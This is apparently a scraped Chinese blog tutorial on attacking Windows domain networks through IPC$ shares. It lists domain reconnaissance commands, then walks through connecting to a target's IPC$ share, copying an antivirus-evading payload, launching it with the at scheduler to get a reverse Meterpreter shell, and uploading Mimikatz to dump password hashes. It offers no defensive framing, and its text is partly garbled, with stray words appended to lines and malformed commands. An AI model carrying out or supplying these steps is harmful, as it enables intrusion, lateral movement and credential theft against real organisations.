内网IPC$入侵

1、域操做相关的命令
1.查看域用户windows

net user/domain
2.查看有几个域服务器

net view/domain
3.查看域内的主机dom

net view/domain: XXX
4.查看域里面的组工具

net group/domain
5.查看域内全部的主机名post

net group "domain computers" /domain
6.查看域管理员操作系统

net group "domain admins" /domain
7.查看域控制器blog

net group "domain controllers" /domain
8.查看企业管理组进程

net group "enterprise admins" /domain
9.查看时间服务器ip

nettime/domain
2、IPC$入侵
IPC$入侵,即经过使用Windows系统默认启动的IPC$共享得到计算机控制权的入侵,在内网中及其常见。
假设如今有一台IPC$主机:127.0.0.25,输入如下命令。hash

#链接127.0.0.25的IPC$共享:
D:>net use \127.0.0.25\ipc$
#复制srv.exe到目标主机
D:>copy srv.exe \127.0.0.25\ipc$
#查时间
D:>net time\127.0.0.25
#用at命令在10点50分启动srv.exe(注意这里设置的时间比主机时间快)
D:>at \127.0.0.25 10:50 srv.exe
上述命令中的at就是让计算机在指定的时间作指定事情的命令(例如运行程序)

这里把免杀的Payload上传到PAVMSEP131服务器,而后利用at命令启动Payload,反弹回Meterpreter Shell
将木马复制到目标服务器

查看系统时间

使用at命令启动木马

接着返回handler监听,能够看到反弹成功了,咱们得到了PAVMSEP131服务器的Meterpreter Shell
反弹成功

下面看看PAVMSEP131服务器的信息和如今的权限
查看系统信息

能够看到有SYSTEM权限,说明既能够使用Mimikatz等工具,也能够输入 run post/windows/gather/hashdump来抓Hash
在用Mimikatz抓Hash前要注意一点:若是服务器安装的是64位操做系统,要把Mimikatz的进程迁移到一个64位的程序进程中,才能查看64位操做系统的密码明文,在32位系统中就没有这个限制。

这里使用Mimikatz抓Hash

上传Mimikatz

抓取Hash

查看抓到的域用户的权限

相关文章
相关标签/搜索